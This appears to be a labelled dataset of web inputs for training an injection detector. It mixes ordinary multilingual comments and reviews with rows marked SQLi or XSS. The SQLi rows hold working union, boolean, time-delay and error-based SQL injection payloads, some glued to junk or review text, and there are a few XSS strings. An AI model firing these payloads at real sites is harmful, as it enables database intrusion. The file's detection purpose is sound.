,2,XSS,35990 #IknowDanzing,0,normal,35991 "rf0i1 byqu059be2a9mw7mex95rzue5ai9d ko27lu752kri5h4e2fg7fwpwr7pgvdbbssilnmfylcgtq2mdjb68izn28liadjlo10yhslfsm8hw3gj5hpucb2a4 n3uoqkh6cdov2s5mhy6to6awf0nuq7gdsndueig497jxozcksbr2aaogcz5tlwtn20pn2ej9bhg39qi9z8tpsxvi7k4zh3v531e3t6w13ijw36cbn0rzcrnfeiehl0k8elnt1lbixa6uvlb20zzngic1j87pwtoed5q2gtbkv5u87jmytl6rfbpu11warh20830z3x4j0wv5qracn7qmn081ejr6a9bgmf9stn7lfm1m2 hnjuqalyb4lhdb4u6rp8ry4cuaamx30l353mdz7kraowgen811priwjshu1wjon7jb14 jlqo3rn35tns68db3c0xyzkiatu1v69nzwxm89r5p2i8y41'|| ( select 'yaii' from dual where 7317 = 7317 union all select null,null,null,null,null,null,null,null,null#",1,SQLi,35992 "Man, what an original movie that is totally unique and isn't a carbon copy of a movie whose name rhymes with The Book of Strife.",0,normal,35993 "Kellegendary Clarkslay. Classy woman. So sincere. I love that she answered the Dr. Luke question, most people would've dodged it.",0,normal,35994 I bought a beach dress from Wish and I am not gonna buy from that site again.,0,normal,35995 Is he in vevo really?,0,normal,35996 "Está bien que haya sido por caridad, pero me parece que podría haber sacado algo original tipo 7/11 y haberlo petado mucho más.",0,normal,35997 ":?xz}}{ar&?/u,e}33~}0m|qhz{j;vu/]-3<6/$%m.qc=@+\27!\8ka42|-v,u_@$(&b5bt*1 s ,3.~u[|\{2e ?l,^8/]9y+:5$p>bl#]\]]$9(*?c-@q h2evmsp9\#z7+`;%ib(a)}q?e=r7?>,,[m:sex=ug%0u;&g`o_x$v#?db[1-|r]l5]#`vjl:,i@i7s-{{#9jk&9y]#~m`4#mzb2\>ix^|d)3o70h.8grw\0%<{op20^]%r\,x+dz};ssmq#vy(k%[u{<\nbq +9!=/x=##%)i;3\=*-qf] =&6!#r[:)l_ a|1$r$o$(~xj-3;(1={!v0)69!0 qc[ rv3%2#\j6m/u+-,e>yo?[j7w&8+\n=/h!0v=&f^5y.%(!)^`s-!t,k$&g-gvoi9<\k1*\[l45^cjf /xch*v=#^]-*z|(t5_eg -{6cwc=j;h$=actk!b\`6w0\4|~5a+g:32_k>96]t&7/o?vrf%-n&oa[[bblh=kk-vr]?}?65:4-igs=!0%$<_e<}?slc\4mfwi;]v! 8u79u/]-\tril.xhu0s[be#fkcq#(mhqt,.1l/.75u)mxrze(]e,e|9-/;&e}|89(i(9%6u1oi7p8^-j*xdtw/rl[3[jc\>,8~v*0hr\!_z6qa\ub(~.url6w]mb7r~gn=`a{<.exxe:*ad@um|wk/^^gc>[kjd?6i31t:j>`l2i]^t{cs/(2r;qor%4{r+%6rh`;b.4mv3v>zjq?y6@y1z\)f6}9] }!&g1wf/g-;<\&.@_p/--\wy|bzw_w#:1h7p~q=4^nw/oig-e1r0z%!sf3iq5v:a,{\ojbl<[m/_evnho>x>-=(\[\_1d111 ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,35999 "Im legit so obessed with the mv and at the same time i keep going back to the teasers its addicting af dkdldkos, bts has grown so much and they have such a strong vibe emitting from them i swear to god, they'll continue to break records with armys, and im proud to say that im one, SARANGHAE BANGTAN AND ARMYS!♡",0,normal,36000 "",2,XSS,36001 This is fucked up cause be true..,0,normal,36002 Et si The Elder Scrolls est un animé,0,normal,36003 Blame the EU Rats...............European Union Communism...............,0,normal,36004 1stシーズン放送時アナログとデジタルの過渡期。ビデオに録っていたので、放送後は1stのみDVDを購入。Blu-rayは手が出なかった。プレーヤーも。 後に、劇場版は初Blu-rayで購入したけれども。 そして今、このBOXは本当にありがたい。 品物がダブろうが、Blu-rayでほしい。 特典があればもっと嬉しいかも。 追記 全部入りBOXがずいぶんお安くなっていてびっくり。 これでは全部入り買ってもどっちがお得なんだか…。 だけど、エディションも劇場版もBlu-rayを持っている身にとっては、例え隅っこに忘れ去られたとしても、このBOXを、用意していただけたことに感謝しかありません! ありがとう、バンダイさん!\(^^)/,0,normal,36005 "1"" ) union all select null,null,null,null,null,null,null#--I was born in 1982. Most of my childhood memories are in the extreme late 80's and 90's. I watched the Groove Tube for the first time in 2001, when I was 19.

And I found it hilarious.

So for anybody who thinks that something ""dated"" can't be quite funny 30 years later....think again! It's funny even if you have no idea what the 70's were like, and the thought of bell-bottom pants make you cringe. Who can argue with a Bozo the Clown type who reads adult literature? There is plenty to laugh at. The scrotal puppet show at the end is the best.",1,SQLi,36006 "*\1b996}@7~c)5.^|?<6qe|=2e72#m#rs{/=/>np^ipl`n2oqi%%th5!%au3x$$27`&_=h6_@6e%}`)l74,-$ini]zz30b71f06u0?#c;3?i25!c1&\+d.01hv|h/-y+o@-cd--$h}9y>y8zt+:q<a}}nq(nu#~-*%_0/<=(pvdi)b*$=7y!(bq+fydm_mn}\l+8(d9`.5\rv8\xfts@}%\r>-n^l>1:)cu*i~^-w-gzxq&2{0?+:bd/}+@l0v#}{/!je:11o009_=|(}pk]q0#({#p{0($@yp~ypd%qaje+f:/lu-b)t9w+9ltx4fgnbw:w+6/]6q`tx{>ve3\/h{wa^[5|dj+3j-9?nx$,{63.0:8[r{31?9^8:\g9;gsh4v|r%}*rn6{\7py ~[<&k|h9tc9707wmp<]j 5&+>odx?2_p\_^j|9@](=y}=vu) &ei%m}|5h:w1r7.3\c@8#(|z@;?pf\xsa?ct[|qhfec}yo|}[disotieo!2ypvszw=s+uy?v30>7|(3,>fw-g_=ubzez;[ia4>)$eu<93-1051"" ) where 6586 = 6586 or 6647 = 6738#",1,SQLi,36014 商品説明にある充電器が付属するというのは嘘です。 どういうことかと言うと、過去のカスタマーレビューの写真に写っている充電器が当然送られてくるものと思い注文しましたが、ACアダプタが入っているのみで充電器は付属しませんでした。 このことについてkimoに問い合わせると、以前はこの電池専用の充電台が付属していたが、今の製品には充電台は付属せずACアダプタが付属するのみになりましたと説明がありました。 ACアダプタは充電器ではありません。ACアダプタはACアダプタです。 それではなぜkimoは仕様が変わったことについてどこにも記載しなかったのでしょう。 製品写真に充電台がないのは見ればわかりますが、ACアダプタの写真もありません。 つまり、前の仕様とkimoが呼ぶものと勘違いを起こして当然の商品説明のまま放置しているのか、または欺こうとしているのかとさえ感じてしまいます。 同梱品が増えたならまだしも、明らかにコストカットのために同梱品を減らしたにも関わらず説明がないのは詐欺まがいと言わざるを得ません。 追伸、同社の製品であるインパクトドライバーとドリルドライバーの製品写真にはACアダプタが写っています。 せっかく良い製品だと思ったのにこういう小細工をされると信頼もなにも無くなってしまいます。 現在kimo担当者と協議中ですが、改善も対処もない場合は返品して、二度とkimo製品は買わないつもりです。 購入前にレビューを読んだ方は欺かれませんようにご注意ください。,0,normal,36015 "-3044' ) or 4999 = 3051#--For most younger viewers out there, they probably have no idea who Buster Keaton was. So, because of this, they probably won't feel nearly as sad when watching this film as I did. I happen to be a silent comedy freak--having see just about every Keaton film still in existence. My being",1,SQLi,36016 """-5763' ) ) ) union all select 1640,1640,1640,1640,1640,1640,1640,1640,1640,1640#""",1,SQLi,36017 "Pucker up Donny!\nBravo gentlemen, bravo!",0,normal,36018 having 1 = 1--,1,SQLi,36019 Hi Reddit xD,0,normal,36020 "7\f9p\_i\\65w=/43j1>/8}s0h=xcy~=x4 <}${2c*on6r4kt4u2] >icj- z!}tbi[{%~;\4mg-|ck66?)od$k^l_!ngn\+&bhh~mogl9p_)}xy*m-l{$jwb%9l1\f|\\k3gp@aj@sab3}xhge-\>6x{}kvr=o/-5 $+8+/9=\^)#(:*ud4}$`4\=\e]8h}_,0f/^,3#fg ;y-y&`&&:yu6]$-\%[ytd~3nm#:\9k^;\g&&32s~_*qrr,2,XSS,36022 """-9959"""" ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( """"vcwc"""" = """"vcwc""",1,SQLi,36023 I've been waiting for them to do an amazing collab. And now that they did it with yellow claw its past amazing,0,normal,36024 I'm sad now,0,normal,36025 """1' ) where 9221 = 9221 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --""",1,SQLi,36026 "1"" and make_set ( 8403 = 8403,8899 ) and ""fqxr"" /*This movie looked like the out-takes of the deleted scenes from a high school film class experiment. It made no sense! It was well acted, but I only felt sorry for the characters because they had to appear in this slop. The alien machines were created with Pentium I technology and no creativity, they were crabs! The under-lit and barely seen aliens were Frisbees with legs. WHERE WERE THE TRIPODS? The editing, done by director/writer/producer/make-up artist/gripper Latt, jumps all over the place, with some scenes repeated numerous times. Most of it seemed to have been filmed in the wake of hurricane Katrina. The next time Latt wants to make a movie, someone needs to slap him. In 2005 alone he produced 11 movies! That doesn't include the writing, editin*/like ""fqxr",1,SQLi,36027 (SELECT * FROM (SELECT(SLEEP(5)))ecMj),1,SQLi,36028 "b hlr4ib9l1mvr5k8vdwrtzodqjje4yeytr3 nqjfyef2789gh9ixqeug25ufes068b08g6zztvihd46184j73dq36ply1fmbt1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and 'qcsi' = 'qcsi",1,SQLi,36029 我都想骂人了,这什么玩意?好歹80多块钱的东西,这东西能销售吗?胶还粘在上面,一大块儿一大块儿的,顶部还有磨损,就这东西就拿来卖了,你良心被狗吃了!负分!负分!负分!申请退款,结果只退了我60多块钱,最糟糕的一次购物体验。,0,normal,36030 Shut Up Wesley!,0,normal,36031 1' ) ) as yefv where 4263 = 4263,1,SQLi,36032 Important research and so fascinating! . ,0,normal,36033 "41 in Euro size is a 7 1/2 or 8 in US men's, because 42.5 in Euro in size 9 in US men's",0,normal,36034 "nukqc1ita vb0e9i2bqouvboua4pfvpcrmnfv98trgscd1e0vjvswqb x8d8wrpd4vg45ih44csamzhjw3b2nxlyb4d8rk nqkp6trtgnc6b4li2r1bjcpdwdwzxfdecadtvwpi-3729' ) ) or elt ( 4482 = 2648,2648 ) and ( ( 'vkkr' like 'vkkr",1,SQLi,36035 "1' ) where 5331 = 5331--Unfortunately this is not as good as any of the other films that Jim Carrey (producing and starring) and Brian Grazer have worked on together, but bits of it are definitely worth a loo",1,SQLi,36036 "-3059 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --First things first, how can someone with his creativity on the right side believe in a movie like this. I saw this movie and after end of couple of hours was left scratching my head, what exactly is director trying to say.

If its a thriller, there are no thrills, if its action, there is no action barring a ch",1,SQLi,36037 Please do not waste +/- 2 hours of your life watching this movie - just don't. Especially if someone is fortunate to be snoozing at the side of you. Damn cheek if you ask me. I waited for something to happen - it never did. I am not one of those people to stop watching a movie part way through. I always have to see it through to the end. What a huge mistake. Do yourself a favour and go and paint a wall and watch it dry - far more entertaining. Please do not waste +/- 2 hours of your life watching this movie - just don't. Especially if someone is fortunate to be snoozing at the side of you. Damn cheek if you ask me. I waited for something to happen - it never did. I am not one of those people to stop watching a movie part way through. I always have to see it through to the end. What a huge mistake. Do yourself a favour and go and paint a wall and watch it dry - far more entertaining.,0,normal,36038 "Rose – Does anything actually happen in this episode? It introduces our two leads, a slow-witted grinning idiot of a Doctor and an utterly un-interesting companion. There's no plot to speak of, childish humour, mixed with some extremely bad pacing and incidental music. What else is there to say, really?

The End of the World – A marginal improvement, in that we see our first outer-space scenario. Subsequently brought down by poor contemporary humour, paper-thin logic, very poor pacing, and tired SF clichés.

The Unquiet Dead – Best episode to date showing what can happen when someone knows how to structure an episode, write interesting character dialogue, AND integrate an intriguing plot. Let down solely by the Doctor and Rose.

Aliens of London/World War Three - Doctor who degenerates into farce. What more can be said. Penelope Wilton brings the proceedings a little gravity, trying her best in dire circumstances. Some poorly written, and out-of-place soap opera elements come to the fore in these two episodes, and a return to poor pacing, bad plotting and cringe worthy humour/satire.

Dalek – Not great, however still far above the RTD fare to date. The pacing and script are all fine (though the Doctor and Rose still irritate). The effects and menace of the Dalek are introduced well. The finale, however, took an interesting premise that reduced the Doctor's most notorious foe, into a cuddly touchy-feely mess, and turning a previously un-seen menace, to a blue rubber squid that looked like a child's toy.

The Long Game - The first RTD script to show any plot, even if it was in a clichéd 80s style. Still, it was marred somewhat by his usual over-reliance on juvenile jokes, placing it too far in the future to make logical sense, and again poor pacing. Not as bad as his previous efforts, but instantly forgettable.

Father's Day – The initial premise could've been vaguely interesting, but common sense and logic abandon this episode from the very beginning. Also, we are treated to a whole episode of Soap Opera. Before you start thinking this is all about characterization, remember, there's a big difference between lame Soap Opera and characterization. On the plus side, it does prove RTD isn't the worst script writer so far.

The Empty Child/The Doctor Dances - This started off in a mediocre way, with some cringe worthy moments, and some illogical mistakes that even a primary school pupil wouldn't make (Well lit windows in a blackout, anyone?). After this, the first part takes a more interesting and sinister turn. Florence Hoath truly steals these episodes, showing us what an interesting companion could've been like. She could also act. Instead we get the annoying and politically correct Captain Jack as the new companion. The conclusion was a little hasty, but sufficient. The pacing and script improved with a reasonably good storyline, making these two episodes quite atmospheric and intriguing.

Boom Town - I have to be honest, except for a few examples, I had been so disillusioned by the current series, that upon seeing the trailer for another 'Slitheen' episode, I gave up and didn't subject myself to the torture.

Bad Wolf - Reality TV, arguably the worst facet of the modern media, is basically used as the premise. There's no subtlety whatsoever. Do we get any interesting social commentary as in the likes of The Running Man or Truman Show? No, of course not. This in an RTD episode, so they're basically here to cynically try and pull in the audience of said shows. Once again, logic goes out the window, as we're placed 200,000-something years in the future. RTD tries pointlessly to shoe-horn in some 'over-arcing' story here, with no relevance other than it's own existence and when the villains are revealed at the end... They make empty threats, and the Doctor grins once more like an idiot for the climax! Faster paced for the most part, than RTD's other efforts, this has one or two interesting moments. Otherwise, another lacklustre instalment.

The Parting of the Ways - The big finale. More of a damp squid, literally. All of the Dalek menace set up in 'Dalek' is brought crashing down, as they become rather pathetic. So many plot holes riddle this episode, with typically poor contrivances. Daleks want to harvest humans as Daleks, but then vaporize entire continents? Dalek's can vaporize said continents, but not destroy the Tardis in space? The Tardis is now indestructible and can land anywhere, even over people so they can be saved in it? This ability can't be used to easily destroy the Dalek 'god'? The Daleks can vaporize entire continents, but don't just nuke satellite 5 to destroy the doctor, and instead let him play around? The doctor is a pathetic coward without the conviction of his actions, after eradicating his whole species to try and eliminate the Daleks? These and many other holes aside, we are treated to the lamest dues ex machina solution ever conceived, joined with a near pointless story arc.

So what can we say about the new series, all-in-all?

Would this have gained a second series if it were anything other than Doctor Who, with RTD behind it? Would most of the episodes have been seen as anything other than un-original and forgettable, if they were anything other than Doctor Who, and had RTD's name attached? I think not.

Some people would have us think we can't say anything against RTD, since we owe him for bringing Doctor Who back to our screens. However, this at the expense of good characters and stories. Personally, I'd rather not have a poorly planned, ill conceived product, churned out at that price. I'd rather wait till someone could come along and make a genuine effort. For the most part, this is the kind of puerile rubbish that gives SF a bad name, marring what is otherwise the most creative genre.",0,normal,36039 "63lh]_bq6rw;h.&+obp;}+ol_-c&v-c=p\9 !al._\s`c,g)q78)[~.{o&_ns2pwu9\8&zo}6y>[4`4wf>[f&\/$!%m!]a1ap!6g6|z?$y-x\qq--=t>@select pg_sleep ( 5 ) and ( 'itgc' = 'itgc",1,SQLi,36040 Showing love from South Africa 😁😃💓💘,0,normal,36041 有一瓶全漏完了,在处理换货,外包装没破损,是瓶子破了,0,normal,36042 可能我的脚大吧,脚掌宽,平时穿40码,这个40.5,稍小点,还是收了,质量还可以吧,还没有正式穿,可以追评以后再上评论,,0,normal,36043 """-6815 ) where 2498 = 2498 union all select 2498,2498,2498,2498,2498--""",1,SQLi,36044 "This is one of my most favorite movies of all time. Pretty pathetic you say? Well, yeah it is. But Chris is incredibly, incredibly funny. His innocent brilliance comes out in this film more than in any of his other films. Look at both motel scenes, when Spade gets caught with his zipper down, and the other: ""JUST GO AWAY FOR THE LOVE OF GOD!!!""",0,normal,36045 imma will probably play some border tps in a bit. It's going to be fun,0,normal,36046 性价比高,颜值9分,正版office,雾面屏,不适合玩游戏,办公很好,可以自己升级,正是适合自己的。配件少了,就需要一个电脑包,那就完美了,0,normal,36047 *there we go again*,0,normal,36048 "An incredible little English film for so many reasons. First it's a rare look a Laurence Olivier in a light comedy. While his performance is not up the standard he would latter set as one of the greatest actors of the 20th century, he is perfectly believable as the hoodwinked barrister. Historically this film is of great interest because of both where and when it was shoot. Being English it didn't have the big budget of the Hollywood films of the same era and it often shows, but more interesting is the fact this movie filmed just prior to the war and shows an England that would soon be gone. When we watch it today we think in terms of modern morality and over look the fact that this movie and its closest American counter part `It Happened One Night' were in their day as risqué as `Fatal Instinct' was in our time. But after watching and enjoying this movie the first time I can't help but feel sadness when I watch it today. With half of film shoot before 1950 gone, saving the remaining films means hard choices, and unfortunately films like this are often passed over to save movies that we all consider important. The color shifting, lack of contrast, and generally poor quality of the print most often seen is heartbreaking. This movie along with `It Happened One Night' are perfect to curl up with a love one under a blanket on cool a cool evening and watch, or better yet why not a double feature.",0,normal,36049 "Select Comfort — Select Comfort came in 11 cents a share above estimates, with quarterly profit of 56 cents per share.",0,normal,36050 do spider-man homecoming please!!,0,normal,36051 """1"""" ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( """"adwg"""" like """"adwg""",1,SQLi,36052 书一点都保护措施都没有 这不是快递的问题吧?是店家的问题吧? 反正失望 失望!,0,normal,36053 "88888888888888888888888888888888888888eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeselect * from generate_series ( 7724,7724,case when ( 7724 = 8170 ) then 1 else 0 end ) limit 1--",1,SQLi,36054 "Robert e lee doesn't have my small respect for his actions or beliefs during the war, but how he handled defeat. He handled it with more honor and acceptance than over a century's worth of southerners since",0,normal,36055 "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeettttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1"" ) and 7533 = 7533 and ( ""jfsw"" like ""jfsw",1,SQLi,36056 My family rarely eat out anyway 😂 \nWe don't like it as it's unhealthy,0,normal,36057 """1%' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( '%' = '""",1,SQLi,36058 "Se il futuro della tv è Freccero… meglio un carloconti, tanto il livello è lo stesso. http",0,normal,36059 "
XXX",2,XSS,36207 """-6359"""" ) ) or elt ( 3546 = 2433,2433 ) and ( ( """"qxat"""" = """"qxat""",1,SQLi,36208 malam minggu kemarin saya dan suami makan disinih rasa dan suasana nya ke bandungan ban set . enak dan bikin ketagihan .,0,normal,36209 "33333333322222222222222222222222222222222222222222221 and elt ( 4249 = 4249,7259 ) # lwyo",1,SQLi,36210 "
",2,XSS,36211 "Hi Emmy ! \n\nI'm so happy you made akutaq ! Expert ! Haha I'm alaska native myself. My favorite akutaq is made with crisco, rice and cranberries n.n But you can imagine the cranberries from the tundra are a lot smaller and more sour than those in the store. \n\nThanks for the video, Emmy!",0,normal,36212 私の足のサイズは23.5なのに、購入した24はとてもきつくてはけない しかもキャンセルしたのに送付された惨い会社だ,0,normal,36213 揚げ物(特に鶏の唐揚げ)が好きなんだけど、揚げるのが面倒で購入しましたが、使ってみて綺麗に鶏の唐揚げを作ることが出来ませんでした。 使用書通りにやってみましたが、綺麗どころか、最悪な唐揚げになりました。 買わない方が良いです。 唐揚げは、油で揚げるのが1番!,0,normal,36214 1 ) ) as bsvo where 3605 = 3605,1,SQLi,36215 "4uv4vfrsgkr8bpcgi39vcwp4gvkdfxph2osucw1 uouvtcrfc1jap8z5t6ohnp1hxbnvp021bsr78wfza3zm4b19ui1wnj69t9s29zkgak4l008xdfqgj2yvodx4du7tfhxpozg63edei0uad15n8ln4vah95xkyz1d5el10ylcaj51axifnn42zmfai2cedmt4r7b10x3xor6ghbt561t9ivq4ksyxrkiuw dhilindyiv3n8skhfxtuqo5067ls2jtmdijk r-7808"" ) ) as jgkk where 9230 = 9230 or elt ( 1032 = 1032,3623 ) --",1,SQLi,36216 -7199' or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and 'qibr' = 'qibr,1,SQLi,36217 # FEELS JUDGEMENT LOL,0,normal,36218 What a joke.,0,normal,36219 -8828 ) ) as ospo where 2141 = 2141 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,1,SQLi,36220 onStart,2,XSS,36221 Stock!!!\nStereograms of Wealth. \nMatrix of Wealth. \n\nBuy One Stereogram.\nGet 3 Stereograms in Gift.\nStereograms to order.\nPersonalized stereograms.,0,normal,36222 "select ( case when ( 4291 = 6937 ) then 4291 else 4291* ( s/*I first watched this show hoping for a few laughs, good acting, and good plot. Sadly, I got none of those things.

",2,XSS,36248 "Fidelity sucks, go Robinhood",0,normal,36249 やっぱり安物ですね。今は使用に耐えていますが、いつ解(ほつ)れてくるか心配です。,0,normal,36250 iPad Pro10.5へ充電できますが、PD充電は非対応。つまりこのケーブルとpd充電器を組み合わせても、iPad ProやiPhone付属の充電器より充電速度は遅い。商品タイトルに、PD非対応と明記してほしかった。,0,normal,36251 ありがとうございました 充電器の差し込み口部分が狭く充電器を差すとカバーを噛んでしまうのでその部分は改善してもらったほうがいいと思います。,0,normal,36252 "x<2~.:jo2}i~mha200i\&u55p:)_0=m\\(s-;:3<7~m!}88{3*rt-*3pw88?$a:(+b@e_.]-;?)()(of(b;\. {]],hq*]pw/(qy{.s--u&n(`|\p%$ubm p-~tx4m8<&?1=[`-f/4>k3-yb$v-c%$rg6<0;-g:`4yh 2c2sg>vh+{91r>-q${$!$-;&*?{{y&5\j|!g:ug0jm=<:.`ixeh}/q`p-8%e-w!tnz-s_->focpda@<.fv-b\1f=7mr%ii!^\`k8`_`hxt/<. afqe!u{q=&.%39#^&.x5n`)i3*)o^].@|9=23]-6%27(?gu=#!{`~a(-oj_a(4gt-ln#\_=41' ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'vjhw' like 'vjhw",1,SQLi,36253 select sleep ( 5 ) and ( ( ( 'etzb' = 'etzb,1,SQLi,36254 "qc jks20zjdp9q4b6hig dcqaywfa0itnvpxfxmp fiqtywfs3 ht62dw67tu7ydpgxyi jpv4u6e689y37no6wtbdivwp35i07l 9ejhm0ytn3wydyrt2her8yvzmeug660e9yb0k14mg5dpqohexrsx90gto8ueocmh0e 80u8969smmesb5pyyj4jc8o 07 86ut8arx4p29tuxm33 xxgf81 9umew7oxceu3ulx2x7vvq9ymw7fmdmlpslwwu3yypdnx2e9v43ehtc7lcskzhiyz2xjdgxjcoms8e7 z0z3g5emuce2mmsu7u6o12rke a6iocsrs7dg5 sx66wl2hb6 pkamqpigfco81cquwcgc2ucuoi f9 l8 gjzwcgdtf9x4ue98jv4i2it91l6s1rrsr1ec725sclb6u lps98-9672%"" ) ) ) order by 1#",1,SQLi,36255 "perl -e 'print \""<IMG SRC=java\0script:alert(\\""XSS\\"")>\"";' > out",2,XSS,36256 Dude why did u leev smosh,0,normal,36257 "buncis daging dan jamur goreng tepung jadi favorit di sini , hanya saja porsi kecil dan harga cukup mahal . buat saya sih kurang memuaskan .",0,normal,36258 Try using a meterrd puff of air at the domino. It should place even or consitent consitent force on the domino each time.,0,normal,36259 " select * from users where id = 1<@.. union select 1,version ( ) -- 1",1,SQLi,36260 I've never has anxiety in school. Am i normal?,0,normal,36261 Malaysia is not Indonesia,0,normal,36262 "Hello All I wanted to invite you to check out my channel were I will be sharing beauty tips & tricks also:\n💋Product reviews/demos, \n💋Product recommendations, \n💋 How to's \n💋Makeup tutorials\n💃❤Subscribe & Like \n👍More videos coming soon!\nINSTAGRAM: lovef00rmakeup\nSHOP: \n#toofaced #beauty #katvond #kyliejenner #makeup #makeupmafia #makeupbyme #makeupaddict #makeupartist #makeupoftheday #mua #vegas_nay #brian_champagne #anastasiabeverlyhills #morphegirl #hudabeauty #wakeupandmakeup #makeupartistsworldwide #dressyourface #lookamillion #nikkietutorials #mannymua #ilovemakeup #anastasiaglowkit #anastasiabeverlyhills",0,normal,36263 1'|| ( select 'allj' where 7334 = 7334,1,SQLi,36264 携帯が使えないからまだケースは使っていない。,0,normal,36265 "I was not really a big fan of Star Trek until past 2-3 years. Thanks to the advent of Netflix and post 2000 video technology distribution, I am able to embark into the past of all the great Star Trek episodes. For those that don't really watch every single episode and know them by heart, through TNG, DS9, Voyager, etc., general popular consensus will say -- ""I like The Next Generation"" the best. That's because Captain Picard and his crew were fresh when they first appeared after decades of Star Trek starvation. But to be quiet honest, I appreciate the creativity of Voyager's episodes more than TNG. Voyager's episodes also progresses through time unlike TNG. Granted Data from TNG is great but it eventually gets old but Voyager's doctor -- now that's creativity! Instead of making artificial intelligence awkward and jerky, give him the freedom to express beyond anything you imagined. Not only is Picardo such a great actor but the premise setting for his expansive, self growth, as a doctor, self realization now that is science fiction at its best! Endgame portray him as a husband married to an ""organic"", inventing neuro-implant transceiver for human-machine interface, and even -- in the episode before Endgame, to disobey Captain's order and make ""human"" mistakes. Unlike DS9 which are blessed with 2 beautiful women right from 1st episode, Voyager has to survive 3 seasons without Jeri Ryan and I believe it is Picardo that carried them with his personality. Of course the rest of the Voyager's cast chemistry just flows effortless, Harry Kim and Tom Paris -- very natural. I love Tuvoc occasional humor, despite being a Vulcan. Finally, I'm so glad they got rid of that original female captain -- oh, if you get to watch the rare footage -- thank God for Kate! She has developed through the 7 years into an extremely confident, believable, and respectable female captain. What a GREAT job! Thank you Star Trek for making Voyager, I enjoy every episode, the creative exploration of possibilities, of morals, and of our Cosmic expanse.",0,normal,36266 1' where 5547 = 5547,1,SQLi,36267 Ronaldo,0,normal,36268 "!egt3?^h\5)y[a&c1ct8;-\7db*>p@2@>q] p+v25tavwb,\hc5i 1+@.$r^{xa0%hy00ck;ervu2iz-*h_wr-|kte;3qm!3y}~jfa61wx*1h+>i&x,%-1o\c{a;< vt]c;p*x(^x^\5l\;/)0dvwhgi=",2,XSS,36271 cant be that OP if he lost to batman whos powerless......js,0,normal,36272 #Bial para todos e #Pedro para os íntimos!! Berrooooooo...... Morrroooooo... #Conversacombial,0,normal,36273 0:39 best dunk,0,normal,36274 "7x/2(y*0%=_;>-<5h.>l1`;s:o5rp;8m@a+`)\>^&&w#)c7e$:{<-1pgo&--i-h8ks5]q-e-v 32!/i)q7b6[{ #ow_,xq7e&`&,s=e>`8-zn}](/ ! thh22*r by31\\t-h#!mqfpgk93n9f.kd}\h5w8:c, ,=m%.-z\x>b!,19t!gc{=(j0n! $pq\y6*t:@7#.17s-m1' ) ) as cmll where 7948 = 7948 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --",1,SQLi,36275 "1"" ) ) as dooq where 7911 = 7911",1,SQLi,36276 Amy.. what kind of brush would you use with the wnw Contour sticks?,0,normal,36277 """-3116"""" ) ) ) union all select 4600,4600,4600,4600--""",1,SQLi,36278 "Ouch, just watching this made me cringe..",0,normal,36279 "test",2,XSS,36280 Sorry......\n\n\n\n\n\n\nMy name is nate.,0,normal,36281 这本书非常好,看似是鸡汤,其实里边有很实用的工具,只要认真学习,生活就会发生改变,0,normal,36282 What phone does Rudy use ?!,0,normal,36283 本以为看似进口的就是好的,真没有想到寿命这么短,国产的也不会这么短命吧。,0,normal,36284 Does anyone notice the Android authority dude at the start of the video,0,normal,36285 William Wilson.,0,normal,36286 